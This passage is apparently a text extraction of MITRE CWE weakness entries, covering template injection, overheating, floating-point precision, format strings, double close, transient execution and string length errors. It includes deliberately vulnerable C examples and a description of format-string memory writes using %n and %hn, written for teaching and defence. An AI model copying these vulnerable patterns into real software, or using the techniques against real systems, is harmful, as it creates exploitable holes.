"sides" could be affected by injection. The mechanisms of attack or the affected technologies might be different, but the mistake is fundamentally the same. - - - - - - - - - - - - - - - - Server-Side Template Injection / SSTI - This term is used for injection into template engines being used by a server. - - - Client-Side Template Injection / CSTI - This term is used for injection into template engines being used by a client. - - - - - Architecture and Design - The developer might choose a template engine that makes it easier for programmers to write vulnerable code. - - - Implementation - The programmer might not use engine's built-in sandboxes or other capabilities to escape or otherwise prevent template injection from untrusted input. - - - - - Integrity - Execute Unauthorized Code or Commands - - - - - Architecture and Design - Choose a template engine that offers a sandbox or restricted mode, or at least limits the power of any available expressions, function calls, or commands. - - - Implementation - Use the template engine's sandbox or restricted mode, if available. - - - - - CVE-2017-16783 - server-side template injection in content management server - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16783 - - - CVE-2020-9437 - authentication / identity management product has client-side template injection - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9437 - - - CVE-2020-12790 - Server-Side Template Injection using a Twig template - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12790 - - - CVE-2021-21244 - devops platform allows SSTI - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21244 - - - CVE-2020-4027 - bypass of Server-Side Template Injection protection mechanism with macros in Velocity templates - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-4027 - - - CVE-2020-26282 - web browser proxy server allows Java EL expressions from Server-Side Template Injection - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26282 - - - CVE-2020-1961 - SSTI involving mail templates and JEXL expressions - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1961 - - - CVE-2019-19999 - product does not use a "safe" setting for a FreeMarker configuration, allowing SSTI - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19999 - - - CVE-2018-20465 - product allows read of sensitive database username/password variables using server-side template injection - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20465 - - - - - - - - - Since expression languages are often used in templating languages, there may be some overlap with CWE-917 (Expression Language Injection). XSS (CWE-79) is also co-located with template injection. - - - - - CWE Content Team - MITRE - 2021-07-19 - - - - - A hardware device is missing or has inadequate protection features to prevent overheating. - - Hardware, electrical circuits, and semiconductor silicon have thermal side effects, such that some of the energy consumed by the device gets dissipated as heat and increases the temperature of the device. For example, in semiconductors, higher-operating frequency of silicon results in higher power dissipation and heat. The leakage current in CMOS circuits increases with temperature, and this creates positive feedback that can result in thermal runaway and damage the device permanently. - Any device lacking protections such as thermal sensors, adequate platform cooling or thermal insulation is susceptible to attacks by malicious software that might deliberately operate the device in modes that result in overheating. This can be used as an effective denial of service (DoS) or permanent denial of service (PDoS) attack. - Depending on the type of hardware device and its expected usage, such thermal overheating can also cause safety hazards and reliability issues. Note that battery failures can also cause device overheating but the mitigations and examples included in this submission cannot reliably protect against a battery failure. - There can be similar weaknesses with lack of protection from attacks based on overvoltage or overcurrent conditions. However, thermal heat is generated by hardware operation and the device should implement protection from overheating. - - - - - - - - - - - - - - - Architecture and Design - - - Implementation - Such issues could be introduced during hardware architecture, design or implementation. - - - - - Availability - DoS: Resource Consumption (Other) - High - - - - - Dynamic Analysis with Manual Results Interpretation - Dynamic tests should be performed to stress-test temperature controls. - High - - - Architecture or Design Review - Power management controls should be part of Architecture and Design reviews. - High - - - - - Architecture and Design - Temperature maximum and minimum limits should be enforced using thermal sensors both in silicon and at the platform level. - - - Implementation - The platform should support cooling solutions such as fans that can be modulated based on device-operation needs to maintain a stable temperature. - - - - - Malicious software running on a core can execute instructions that consume maximum power or increase core frequency. Such a power-virus program could execute on the platform for an extended time to overheat the device, resulting in permanent damage. - Execution core and platform do not support thermal sensors, performance throttling, or platform-cooling countermeasures to ensure that any software executing on the system cannot cause overheating past the maximum allowable temperature. - The platform and SoC should have failsafe thermal limits that are enforced by thermal sensors that trigger critical temperature alerts when high temperature is detected. Upon detection of high temperatures, the platform should trigger cooling or shutdown automatically. - - - - - - - - Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna - Intel Corporation - 2020-05-29 - - - - - The program processes a real number with an implementation in which the number’s representation does not preserve required accuracy and precision in its fractional part, causing an incorrect result. - When a security decision or calculation requires highly precise, accurate numbers – such as financial calculations or prices – then small variations in the number could be exploited by an attacker. - There are multiple ways to store the fractional part of a real number in a computer. In all of these cases, there is a limit to the accuracy of recording a fraction. If the fraction can be represented in a fixed number of digits (binary or decimal), there might not be enough digits assigned to represent the number. In other cases the number cannot be represented in a fixed number of digits due to repeating in decimal or binary notation (e.g. 0.333333...) or due to a transcendental number such as Π or √2. Rounding of numbers can lead to situations where the computer results do not adequately match the result of sufficiently accurate math. - - - - - - - - - - - - - - - There are three major ways to store real numbers in computers. Each method is described along with the limitations of how they store their numbers. - - Fixed: Some implementations use a fixed number of binary bits to represent both the integer and the fraction. In the demonstrative example about Muller's Recurrence, the fraction 108.0 - ((815.0 - 1500.0 / z) / y) cannot be represented in 8 binary digits. The numeric accuracy within languages such as PL/1, COBOL and Ada is expressed in decimal digits rather than binary digits. In SQL and most databases, the length of the integer and the fraction are specified by the programmer in decimal. In the language C, fixed reals are implemented according to ISO/IEC TR18037 - Floating: The number is stored in a version of scientific notation with a fixed length for the base and the significand. This allows flexibility for more accuracy when the integer portion is smaller. When dealing with large integers, the fractional accuracy is less. Languages such as PL/1, COBOL and Ada set the accuracy by decimal digit representation rather than using binary digits. Python also implements decimal floating-point numbers using the IEEE 754-2008 encoding method. - Ratio: The number is stored as the ratio of two integers. These integers also have their limits. These integers can be stored in a fixed number of bits or in a vector of digits. While the vector of digits method provides for very large integers, they cannot truly represent a repeating or transcendental number as those numbers do not ever have a fixed length. - - - - - - Implementation - This weakness is introduced when the developer picks a method to represent a real number. The weakness may only be visible with very specific numeric inputs. - - - - - Availability - DoS: Crash, Exit, or Restart - This weakness will generally lead to undefined results and therefore crashes. In some implementations the program will halt if the weakness causes an overflow during a calculation. - - - Integrity - Execute Unauthorized Code or Commands - The results of the math are not as expected. This could cause issues where a value would not be properly calculated and provide an incorrect answer. - - - Confidentiality - Availability - Access Control - Read Application Data - Modify Application Data - This weakness can sometimes trigger buffer overflows which can be used to execute arbitrary code. This is usually outside the scope of a program's implicit security policy. - - - - - Implementation - Patching and Maintenance - The developer or maintainer can move to a more accurate representation of real numbers. In extreme cases, the programmer can move to representations such as ratios of BigInts which can represent real numbers to extremely fine precision. The programmer can also use the concept of an Unum real. The memory and CPU tradeoffs of this change must be examined. Since floating point reals are used in many programs and many locations, they are implemented in hardware and most format changes will cause the calculations to be moved into software resulting in slower programs. - - - - - Muller's Recurrence is a series that is supposed to converge to the number 5. When running this series with the following code, different implementations of real numbers fail at specific iterations: - -fn rec_float(y: f64, z: f64) -> f64 -{ -  108.0 - ((815.0 - 1500.0 / z) / y); -} - -fn float_calc(turns: usize) -> f64 -{ -  let mut x: Vec<f64> = vec![4.0, 4.25]; -  (2..turns + 1).for_each(|number| -  { -    x.push(rec_float(x[number - 1], x[number - 2])); -  }); - -  x[turns] -} - - - The chart below shows values for different data structures in the rust language when Muller’s recurrence is executed to 80 iterations. The data structure f64 is a 64 bit float. The data structures I<number>F<number> are fixed representations 128 bits in length that use the first number as the size of the integer and the second size as the size of the fraction (e.g. I16F112 uses 16 bits for the integer and 112 bits for the fraction). The data structure of Ratio comes in three different implementations: i32 uses a ratio of 32 bit signed integers, i64 uses a ratio of 64 bit signed integers and BigInt uses a ratio of signed integer with up to 2^32 digits of base 256. Notice how even with 112 bits of fractions or ratios of 64bit unsigned integers, this math still does not converge to an expected value of 5. - - - -Use num_rational::BigRational; - -fn rec_big(y: BigRational, z: BigRational) -> BigRational -{ -  BigRational::from_integer(BigInt::from(108)) -    - ((BigRational::from_integer(BigInt::from(815)) -    - BigRational::from_integer(BigInt::from(1500)) / z) -    / y) -} - -fn big_calc(turns: usize) -> BigRational -{ -  let mut x: Vec<BigRational> = vec![BigRational::from_float(4.0).unwrap(), BigRational::from_float(4.25).unwrap(),]; - -  (2..turns + 1).for_each(|number| -  { -    x.push(rec_big(x[number - 1].clone(), x[number - 2].clone())); -  }); -  x[turns].clone() -} - - - - On February 25, 1991, during the eve of the of an Iraqi invasion of Saudi Arabia, a Scud missile fired from Iraqi positions hit a US Army barracks in Dhahran, Saudi Arabia. It miscalculated time and killed 28 people [REF-1190]. - - - - - - Sleipner A, an offshore drilling platform in the North Sea was incorrectly constructed with an underestimate of 50% of strength in a critical cluster of buoyancy cells needed for construction. This led to a leak in buoyancy cells during lowering, causing a seismic event of 3.0 on the Richter Scale and about $700M loss [REF-1190]. - - - - - - - - CVE-2018-16069 - Chain: series of floating-point precision errors - (CWE-1339) in a web browser rendering engine causes out-of-bounds read - (CWE-125), giving access to cross-origin data - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16069 - - - CVE-2017-7619 - Chain: rounding error in floating-point calculations - (CWE-1339) in image processor leads to infinite loop (CWE-835) - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7619 - - - CVE-2021-29529 - Chain: machine-learning product can have a heap-based - buffer overflow (CWE-122) when some integer-oriented bounds are - calculated by using ceiling() and floor() on floating point values - (CWE-1339) - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29529 - - - CVE-2008-2108 - Chain: insufficient precision (CWE-1339) in - random-number generator causes some zero bits to be reliably - generated, reducing the amount of entropy (CWE-331) - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2108 - - - CVE-2006-6499 - Chain: web browser crashes due to infinite loop - "bad - looping logic [that relies on] floating point math [CWE-1339] to exit - the loop [CWE-835]" - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6499 - - - - - - - - - - - - - CWE Content Team - MITRE - 2021-07-08 - - - - - The software uses a function that accepts a format string as an argument, but the format string originates from an external source. - - When an attacker can modify an externally-controlled format string, this can lead to buffer overflows, denial of service, or data representation problems. - It should be noted that in some circumstances, such as internationalization, the set of format strings is externally controlled by design. If the source of these format strings is trusted (e.g. only contained in library files that are only modifiable by the system administrator), then the external control might not itself pose a vulnerability. - - - - - - - - - - Primary - - - - - - - - - - Implementation - The programmer rarely intends for a format string to be externally-controlled at all. This weakness is frequently introduced in code that constructs log messages, where a constant format string is omitted. - - - Implementation - In cases such as localization and internationalization, the language-specific message repositories could be an avenue for exploitation, but the format string issue would be resultant, since attacker control of those repositories would also allow modification of message length, format, and content. - - - High - - - Confidentiality - Read Memory - Format string problems allow for information disclosure which can severely simplify exploitation of the program. - - - Integrity - Confidentiality - Availability - Modify Memory - Execute Unauthorized Code or Commands - Format string problems can result in the execution of arbitrary code. - - - - - Automated Static Analysis - This weakness can often be detected using automated static analysis tools. Many modern tools use data flow analysis or constraint-based techniques to minimize the number of false positives. - - - Black Box - Since format strings often occur in rarely-occurring erroneous conditions (e.g. for error message logging), they can be difficult to detect using black box methods. It is highly likely that many latent issues exist in executables that do not have associated source code (or equivalent source. - Limited - - - Automated Static Analysis - Binary or Bytecode - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Bytecode Weakness Analysis - including disassembler + source code weakness analysis - Binary Weakness Analysis - including disassembler + source code weakness analysis - - - Cost effective for partial coverage: - - - Binary / Bytecode simple extractor - strings, ELF readers, etc. - - - - - High - - - Manual Static Analysis - Binary or Bytecode - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies - - - - - SOAR Partial - - - Dynamic Analysis with Automated Results Interpretation - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Web Application Scanner - Web Services Scanner - Database Scanners - - - - - SOAR Partial - - - Dynamic Analysis with Manual Results Interpretation - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Fuzz Tester - Framework-based Fuzzer - - - - - SOAR Partial - - - Manual Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Manual Source Code Review (not inspections) - - - Cost effective for partial coverage: - - - Focused Manual Spotcheck - Focused manual analysis of source - - - - - High - - - Automated Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Source code Weakness Analyzer - Context-configured Source Code Weakness Analyzer - - - Cost effective for partial coverage: - - - Warning Flags - - - - - High - - - Architecture or Design Review - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Formal Methods / Correct-By-Construction - - - Cost effective for partial coverage: - - - Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) - - - - - High - - - - - Requirements - Choose a language that is not subject to this flaw. - - - Implementation - Ensure that all format string functions are passed a static string which cannot be controlled by the user, and that the proper number of arguments are always sent to that function as well. If at all possible, use functions that do not support the %n operator in format strings. [REF-116] [REF-117] - - - Build and Compilation - Run compilers and linkers with high warning levels, since they may detect incorrect usage. - - - - - The following program prints a string provided as an argument. - - #include <stdio.h> - void printWrapper(char *string) { - - printf(string); - } - int main(int argc, char **argv) { - - char buf[5012];memcpy(buf, argv[1], 5012);printWrapper(argv[1]);return (0); - } - - The example is exploitable, because of the call to printf() in the printWrapper() function. Note: The stack buffer was added to make exploitation more simple. - - - The following code copies a command line argument into a buffer using snprintf(). - - int main(int argc, char **argv){char buf[128];...snprintf(buf,128,argv[1]);} - - This code allows an attacker to view the contents of the stack and write to the stack using a command line argument containing a sequence of formatting directives. The attacker can read from the stack by providing more formatting directives, such as %x, than the function takes as arguments to be formatted. (In this example, the function takes no arguments to be formatted.) By using the %n formatting directive, the attacker can write to the stack, causing snprintf() to write the number of bytes output thus far to the specified argument (rather than reading a value from the argument, which is the intended behavior). A sophisticated version of this attack will use four staggered writes to completely control the value of a pointer on the stack. - - - Certain implementations make more advanced attacks even easier by providing format directives that control the location in memory to read from or write to. An example of these directives is shown in the following code, written for glibc: - - printf("%d %d %1$d %1$d\n", 5, 9); - - This code produces the following output: 5 9 5 5 It is also possible to use half-writes (%hn) to accurately control arbitrary DWORDS in memory, which greatly reduces the complexity needed to execute an attack that would otherwise require four staggered writes, such as the one mentioned in the first example. - - - - - CVE-2002-1825 - format string in Perl program - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1825 - - - CVE-2001-0717 - format string in bad call to syslog function - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0717 - - - CVE-2002-0573 - format string in bad call to syslog function - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0573 - - - CVE-2002-1788 - format strings in NNTP server responses - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1788 - - - CVE-2006-2480 - Format string vulnerability exploited by triggering errors or warnings, as demonstrated via format string specifiers in a .bmp filename. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2480 - - - CVE-2007-2027 - Chain: untrusted search path enabling resultant format string by loading malicious internationalization messages - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2027 - - - - Logging - Error Handling - String Processing - - - Memory - - - - Format string vulnerability - - - Format String - - - Format string problem - - - FIO30-C - Exclude user input from format strings - Exact - - - FIO47-C - Use valid format strings - CWE More Specific - - - A1 - Unvalidated Input - CWE More Specific - - - 6 - Format String - - - IDS06-J - Exclude user input from format strings - - - IDS30-PL - Exclude user input from format strings - Exact - - - SFP24 - Tainted input to command - - - ASCSM-CWE-134 - - - - - - - - - - - - - - - - - - This weakness is possible in any programming language that support format strings. - - - While Format String vulnerabilities typically fall under the Buffer Overflow category, technically they are not overflowed buffers. The Format String vulnerability is fairly new (circa 1999) and stems from the fact that there is no realistic way for a function that takes a variable number of arguments to determine just how many arguments were passed in. The most common functions that take a variable number of arguments, including C-runtime functions, are the printf() family of calls. The Format String problem appears in a number of ways. A *printf() call without a format specifier is dangerous and can be exploited. For example, printf(input); is exploitable, while printf(y, input); is not exploitable in that context. The result of the first call, used incorrectly, allows for an attacker to be able to peek at stack memory since the input string will be used as the format specifier. The attacker can stuff the input string with format specifiers and begin reading stack values, since the remaining parameters will be pulled from the stack. Worst case, this improper use may give away enough control to allow an arbitrary value (or values in the case of an exploit program) to be written into the memory of the running program. - Frequently targeted entities are file names, process names, identifiers. - Format string problems are a classic C/C++ issue that are now rare due to the ease of discovery. One main reason format string vulnerabilities can be exploited is due to the %n operator. The %n operator will write the number of characters, which have been printed by the format string therefore far, to the memory pointed to by its argument. Through skilled creation of a format string, a malicious user may use values on the stack to create a write-what-where condition. Once this is achieved, they can execute arbitrary code. Other operators can be used as well; for example, a %9999s operator could also trigger a buffer overflow, or when used in file-formatting functions like fprintf, it can generate a much larger output than intended. - - Format string issues are under-studied for languages other than C. Memory or disk consumption, control flow or variable alteration, and data corruption may result from format string exploitation in applications written in other languages such as Perl, PHP, Python, etc. - - - - PLOVER - 2006-07-19 - - - KDM Analytics - 2008-08-01 - added/updated white box definitions - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Common_Consequences, Detection_Factors, Modes_of_Introduction, Relationships, Other_Notes, Research_Gaps, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-03-10 - updated Relationships - - - CWE Content Team - MITRE - 2009-05-27 - updated Demonstrative_Examples - - - KDM Analytics - 2009-07-17 - Improved the White_Box_Definition - - - CWE Content Team - MITRE - 2009-07-27 - updated White_Box_Definitions - - - CWE Content Team - MITRE - 2010-02-16 - updated Detection_Factors, References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-27 - updated Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2011-09-13 - updated Potential_Mitigations, References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Observed_Examples, References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2014-07-30 - updated Demonstrative_Examples, Detection_Factors, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2015-12-07 - updated Description, Modes_of_Introduction, Name, Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Causal_Nature, Functional_Areas, Likelihood_of_Exploit, Other_Notes, References, Relationships, Taxonomy_Mappings, White_Box_Definitions - - - CWE Content Team - MITRE - 2018-03-27 - updated References - - - CWE Content Team - MITRE - 2019-01-03 - updated References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2019-09-19 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Detection_Factors, Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Common_Consequences, Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Potential_Mitigations, Relationships - - Uncontrolled Format String - - - - The product attempts to close or release a resource or handle more than once, without an intervening successful open. - - Code typically requires "opening" handles or references to resources such as memory, files, devices, connections, services, etc. When the code is finished with using the resource, it is typically expected to "close" or "release" the resource, which indicates to the environment (such as the OS) that the resource can be re-assigned or reused by unrelated processes or actors. APIs or other abstractions are often used to perform this release, such as free() or delete() within C/C++, or file-handle close() operations that are used in many languages. - Unfortunately, the implementation or design of such APIs might expect the developer to be responsible for ensuring that such APIs are only called once per release of the resource. if the developer attempts to release the same resource/handle more than onc, then the API's expectations are not met, resulting in undefined and/or insecure behavior. This could lead to consequences such as memory corruption, data corruption, execution path corruption, or other consequences. - Note that while the implementation for most (if not all) resource reservation allocations involve a unique identifier/pointer/symbolic reference, then if this identifier is reused, checking the identifier for resource closure may result in a false state of openness and closing of the wrong resource. For this reason, reuse of identifiers is discouraged. - - - - - - - - - - - - - - - - - - Implementation - - - - - Availability - Integrity - DoS: Crash, Exit, or Restart - Medium - - - - - Automated Static Analysis - For commonly-used APIs and resource types, automated tools often have signatures that can spot this issue. - - - Automated Dynamic Analysis - Some compiler instrumentation tools such as AddressSanitizer (ASan) can indirectly detect some instances of this weakness. - - - - - Implementation - When closing a resource, set the associated variable to NULL or equivalent value for the given language. Some APIs will ignore this null value or lead to application crashes or exceptions, which may be preferable to data/memory corruption. - - - Implementation - Implementing a flag that is set when the resource is opened and cleared when it is closed and checked before closing can be effective at prevention. - - - - - This example attempts to close the file twice. In some cases, the C library fclose() function will catch the error and return an error code. In other implementations, a double-free (CWE-415) occurs causing the program to fault. Note that the examples presented here are simplistic, and double fclose() calls will frequently be spread around a program, making them more difficult to find during code reviews. - -char b[2000]; -FILE *f = fopen("dbl_cls.c", "r"); -if (f) -{ - b[0] = 0; - fread(b, 1, sizeof(b) - 1, f); - printf("%s\n'", b); - int r1 = fclose(f); - printf("\n-----------------\n1 close done '%d'\n", r1); - int r2 = fclose(f); // Double close - printf("2 close done '%d'\n", r2); -} - - This example only has one call to fclose(). While this is certainly the preferred handling of this problem, this simplistic method is not always possible. - - -char b[2000]; -FILE *f = fopen("dbl_cls.c", "r"); -if (f) -{ - b[0] = 0; - fread(b, 1, sizeof(b) - 1, f); - printf("%s\n'", b); - int r1 = fclose(f); - printf("\n-----------------\n1 close done '%d'\n", r1); -} - - This example uses a flag to call fclose() only once. Note that this flag is explicit. The variable "f" could also have been used as it will be either NULL if the file is not able to be opened or a valid pointer if the file was successfully opened. If "f" is replacing "f_flg" then "f" would need to be set to NULL after the first fclose() call so the second fclose call would never be executed. - - -char b[2000]; -int f_flg = 0; -FILE *f = fopen("dbl_cls.c", "r"); -if (f) -{ - f_flg = 1; - b[0] = 0; - fread(b, 1, sizeof(b) - 1, f); - printf("%s\n'", b); - if (f_flg) - { - int r1 = fclose(f); - f_flg = 0; - printf("\n-----------------\n1 close done '%d'\n", r1); - } - if (f_flg) - { - int r2 = fclose(f); // Double close - f_flg = 0; - printf("2 close done '%d'\n", r2); - } -} - - - - - - CVE-2019-13351 - file descriptor double close can cause the wrong file to be associated with a file descriptor. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13351 - - - CVE-2006-5051 - Chain: Signal handler contains too much functionality (CWE-828), introducing a race condition that leads to a double free (CWE-415). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5051 - - - CVE-2004-0772 - Double free resultant from certain error conditions. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0772 - - - - - - - - - - The terms related to "release" may vary depending on the type of resource, programming language, specification, or framework. "Close" has been used synonymously for the release of resources like file descriptors and file handles. "Return" is sometimes used instead of Release. "Free" is typically used when releasing memory or buffers back into the system for reuse. - - - - - CWE Content Team - MITRE - 2021-09-07 - - - - - The processor does not properly clear microarchitectural state after incorrect microcode assists or speculative execution, resulting in transient execution. - - In many processor architectures an exception, mis-speculation, or microcode assist results in a flush operation to clear results that are no longer required. This action prevents these results from influencing architectural state that is intended to be visible from software. However, traces of this transient execution may remain in microarchitectural buffers, resulting in a change in microarchitectural state that can expose sensitive information to an attacker using side-channel analysis. For example, Load Value Injection (LVI) [REF-1202] can exploit direct injection of erroneous values into intermediate load and store buffers. - Several conditions may need to be fulfilled for a successful attack: - - 1) incorrect transient execution that results in remanence of sensitive information; - 2) attacker has the ability to provoke microarchitectural exceptions; - 3) operations and structures in victim code that can be exploited must be identified. - - - - - - - - - - - - - - - - - - - Architecture and Design - - - Requirements - - - - - Confidentiality - Integrity - Modify Memory - Read Memory - Execute Unauthorized Code or Commands - Medium - - - - - Architecture and Design - Requirements - Hardware ensures that no illegal data flows from faulting micro-ops exists at the microarchitectural level. - High - Being implemented in silicon it is expected to fully address the known weaknesses with limited performance impact. - - - Build and Compilation - Include instructions that explicitly remove traces of unneeded computations from software interactions with microarchitectural elements e.g. lfence, sfence, mfence, clflush. - High - This effectively forces the processor to complete each memory access before moving on to the next operation. This may have a large performance impact. - - - - - Faulting loads in a victim domain may trigger incorrect transient forwarding, which leaves secret-dependent traces in the microarchitectural state. Consider this example from [REF-1203]. - Consider the code gadget: - - - void call_victim(size_t untrusted_arg) { - - *arg_copy = untrusted_arg; - array[**trusted_ptr * 4096]; - - } - - - A processor with this weakness will store the value of untrusted_arg (which may be provided by an attacker) to the stack, which is trusted memory. Additionally, this store operation will save this value in some microarchitectural buffer, e.g. the store queue. - In this code gadget, - trusted_ptr is dereferenced while the attacker forces a page fault. The faulting load causes the processor to mis-speculate by forwarding untrusted_arg as the (speculative) load result. The processor then uses untrusted_arg for the pointer dereference. After the fault has been handled and the load has been re-issued with the correct argument, secret-dependent information stored at the address of trusted_ptr remains in microarchitectural state and can be extracted by an attacker using a code gadget. - - - - - CVE-2020-0551 - Load value injection in some processors utilizing speculative execution may allow an authenticated user to enable information disclosure via a side-channel with local access. - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0551 - - - - - - - - - - - CWE-1342 differs from CWE-1303, which is related to misprediction and biasing microarchitectural components, while CWE-1342 addresses illegal data flows and retention. For example, Spectre is an instance of CWE-1303 biasing branch prediction to steer the transient execution indirectly. - - - - - - Anders Nordstrom, Alric Althoff - Tortuga Logic - 2021-09-22 - - - - - The software does not correctly calculate the length of strings that can contain wide or multi-byte characters. - - - - - - - - - - Implementation - - There are several ways in which improper string length checking may result in an exploitable condition. All of these, however, involve the introduction of buffer overflow conditions in order to reach an exploitable state. - The first of these issues takes place when the output of a wide or multi-byte character string, string-length function is used as a size for the allocation of memory. While this will result in an output of the number of characters in the string, note that the characters are most likely not a single byte, as they are with standard character strings. So, using the size returned as the size sent to new or malloc and copying the string to this newly allocated memory will result in a buffer overflow. - Another common way these strings are misused involves the mixing of standard string and wide or multi-byte string functions on a single string. Invariably, this mismatched information will result in the creation of a possibly exploitable buffer overflow condition. - - - - - - Integrity - Confidentiality - Availability - Execute Unauthorized Code or Commands - This weakness may lead to a buffer overflow. Buffer overflows often can be used to execute arbitrary code, which is usually outside the scope of a program's implicit security policy. This can often be used to subvert any other security service. - - - Availability - Confidentiality - Read Memory - DoS: Crash, Exit, or Restart - DoS: Resource Consumption (CPU) - DoS: Resource Consumption (Memory) - Out of bounds memory access will very likely result in the corruption of relevant memory, and perhaps instructions, possibly leading to a crash. Other attacks leading to lack of availability are possible, including putting the program into an infinite loop. - - - Confidentiality - Read Memory - In the case of an out-of-bounds read, the attacker may have access to sensitive information. If the sensitive information contains system details, such as the current buffers position in memory, this knowledge can be used to craft further attacks, possibly with more severe consequences. - - - - - Implementation - Input Validation - Always verify the length of the string unit character. - - - Implementation - Libraries or Frameworks - Use length computing functions (e.g. strlen, wcslen, etc.) appropriately with their equivalent type (e.g.: byte, wchar_t, etc.) - - - - - The following example would be exploitable if any of the commented incorrect malloc calls were used. - - #include <stdio.h>#include <strings.h>#include <wchar.h> - int main() { - - wchar_t wideString[] = L"The spazzy orange tiger jumped " \"over the tawny jaguar.";wchar_t *newString; - printf("Strlen() output: %d\nWcslen() output: %d\n",strlen(wideString), wcslen(wideString)); - /* Wrong because the number of chars in a string isn't related to its length in bytes //newString = (wchar_t *) malloc(strlen(wideString));*/ - /* Wrong because wide characters aren't 1 byte long! //newString = (wchar_t *) malloc(wcslen(wideString));*/ - /* Wrong because wcslen does not include the terminating null */newString = (wchar_t *) malloc(wcslen(wideString) * sizeof(wchar_t)); - /* correct! */newString = (wchar_t *) malloc((wcslen(wideString) + 1) * sizeof(wchar_t)); - /* ... */ - } - - The output from the printf() statement would be: - - Strlen() output: 0Wcslen() output: 53 - - - - - - Improper string length checking - - - FIO10-J - Ensure the array is filled when using read() to fill an array - - - SFP10 - Incorrect Buffer Length Computation - - - - - - - - - CLASP - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-05-27 - updated Description - - - CWE Content Team - MITRE - 2010-02-16 - updated Demonstrative_Examples, References - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Common_Consequences, Demonstrative_Examples, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-06-23 - updated Enabling_Factors_for_Exploitation, Other_Notes - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Enabling_Factors_for_Exploitation, Modes_of_Introduction, References, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2018-03-27 - updated References - - - CWE Content Team - MITRE - 2019-01-03 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2021-03-15 - updated References - - - Gregory Padgett - Unitrends - 2010-01-11 - correction to Demonstrative_Example - - Improper String Length Checking - - - - A hardware device, or the firmware running on it, is - missing or has incorrect protection features to maintain - goals of security primitives when the device is cooled below - standard operating temperatures. - - The hardware designer may improperly anticipate - hardware behavior when exposed to exceptionally cold - conditions. As a result they may introduce a weakness by not - accounting for the modified behavior of critical components - when in extreme environments. - An example of a change in behavior is that power loss - won't clear/reset any volatile state when cooled below - standard operating temperatures. This may result in - a weakness when the starting state of the volatile memory is - being relied upon for a security decision. For example, a - Physical Unclonable Function (PUF) may be supplied as a - security primitive to improve confidentiality, - authenticity, and integrity guarantees. However, when the - PUF is paired with DRAM, SRAM, or another temperature - sensitive entropy source, the system designer may introduce - weakness by failing to account for the chosen entropy - source's 